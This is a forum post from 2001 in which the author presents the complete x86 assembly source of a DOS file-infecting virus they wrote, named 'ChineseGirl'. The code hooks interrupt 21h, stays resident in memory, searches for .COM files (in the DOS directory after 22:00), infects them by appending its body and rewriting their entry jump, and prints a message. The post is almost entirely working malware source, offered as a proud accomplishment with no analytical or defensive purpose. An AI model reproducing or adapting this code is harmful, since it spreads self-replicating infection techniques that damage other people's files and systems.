-
December 7th, 2001, 09:05 AM
#1
nakoka's "ChineseGirl"
THis is My first Virus in my life.She called ChineseGirl.I had Finished it about 2years ago.it just a small Virus. I belive "assemble language + C = nuclear weapon" all the time!
code segment
assume cs:code,ds:code
org 0h
begin :
push ax
push bx
push cx
push dx
push bp
push si
push di
push ds
push es
jmp ChineseGirl
handle dw ?
jmp db 0e9h
message db 'ChineseGirl! $'
len dw ?
real dw ?
dss dw ?
path db '*.com',0
fpath db '\dos\*.com',0
dos db '\dos\',13 dup(?)
no db 'Z'
hh dd 11112222h
tc db 2eh
tc1 dw 2effh
tc2 dw 004ah
dta db 45 dup(?)
zd proc far
mov bx,cs
mov es,bx
mov ds,bx
push es
mov bx,8d00h
mov es,bx
cmp byte ptr es:[0049h],'D'
pop es
je o1
jmp o
o1:
push es
mov bx,0
mov es,bx
cmp word ptr es:[86h],8d00h
pop es
je nochg
o:
save_21:
push es
mov ax,3521h
int 21h
mov di,offset hh
call oldlen
add di,ax
mov [di+2],bx
mov [di+2+2],es
pop es
jmp zg
stop1:
jmp stop
zg:
mov ax,ds:[101h]
add ax,3
add ax,100h
mov si,ax
mov ax,8d00h
push es
mov es,ax
mov di,0
mov cx,673
rep movsb
mov byte ptr es:[49h],'D'
pop es
push ds
mov ds,ax
mov ah,tc
mov byte ptr [di],ah
mov ax,tc1
mov word ptr [di+1],ax
mov ax,tc2
mov word ptr [di+3],ax
pop ds
chage_21h:
push ds
mov ax,8d00h
mov ds,ax
mov ax,2521h
mov dx,0
int 21h
pop ds
jmp stop
nochg:
mov bx,cs
cmp bx,8d00h
jne stop
cmp ah,30h
je n
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
jmp cs:hh
n:
mov dx,offset dta
mov ah,1ah
int 21h
mov ah,2ch
int 21h
cmp ch,22
jb fn
mov dx,offset fpath
jmp f
fn: mov dx,offset path
f:
mov ah,4eh
mov cx,0
int 21h
start:
cmp ax,0002
jz stop
cmp ax,0003
je stop
cmp ax,0018
je stop
jmp open
stop:jmp bdend
open:
mov ah,2ch
int 21h
cmp ch,22
jb ro
mov di,offset dos +5
mov bx,offset dta +30
mov dx,offset dos
mov si,bx
mov cx,13
rep movsb
jmp roc
ro: mov dx,offset dta +30
roc:
mov al,2
mov ah,3dh
int 21h
mov bx,ax
mov dx,offset handle
mov si,dx
mov [si],bx
readlen:
mov dx,offset dta+26
mov si,dx
mov bx,[si]
c:
mov dx,offset dss
mov si,dx
mov [si],bx
add bx,100h
sub bx,103h
mov dx,offset len
mov si,dx
mov [si],bx
read:
mov al,0
mov dx,1
mov cx,0
call seek
mov dx,offset handle
mov si,dx
mov bx,[si]
mov dx,offset real
mov ah,3fh
mov cx,2
int 21h
mov si,dx
push si
mov bx,[si]
add bx,103h
mov dx,offset dss
mov si,dx
mov dx,bx
sub dx,100h
add dx,673+3
cmp dx,[si]
jne ee
pop si
jmp close
ee: push si
add [si],100h+673
sub bx,3
pop si
sub bx,[si]
pop si
mov [si],bx
writebd:
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,673
mov dx,offset begin
call write
writee9:
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,1
mov dx,offset jmp
call write
writejmp:
mov dx,1
mov cx,0
mov al,0
call seek
mov cx,2
mov dx,offset len
call write
writereal:
mov dx,0
mov cx,0
mov al,2
call seek
mov cx,2
mov dx,offset real
call write
close:
mov dx,offset handle
mov si,dx
mov ah,3eh
mov bx,[si]
int 21h
mov ah,2ch
int 21h
cmp ch,22
jb findnext
print:
mov dx,offset message
mov ah,09h
int 21h
findnext:
mov ah,2ch
int 21h
cmp ch,22
jb fnn
mov dx,offset fpath
jmp fff
fnn: mov dx,offset path
fff:
mov ah,4fh
int 21h
jmp start
int 20h
zd endp
seek proc near
push ax
mov bx,offset handle
mov si,bx
mov bx,[si]
pop ax
mov ah,42h
int 21h
ret
seek endp
oldlen proc near
mov ax,cs:[101h]
add ax,101h
ret
oldlen endp
write proc near
mov bx,offset handle
mov si,bx
mov ah,40h
mov bx,[si]
int 21h
ret
write endp
bdend:
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
code ends
end begin
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|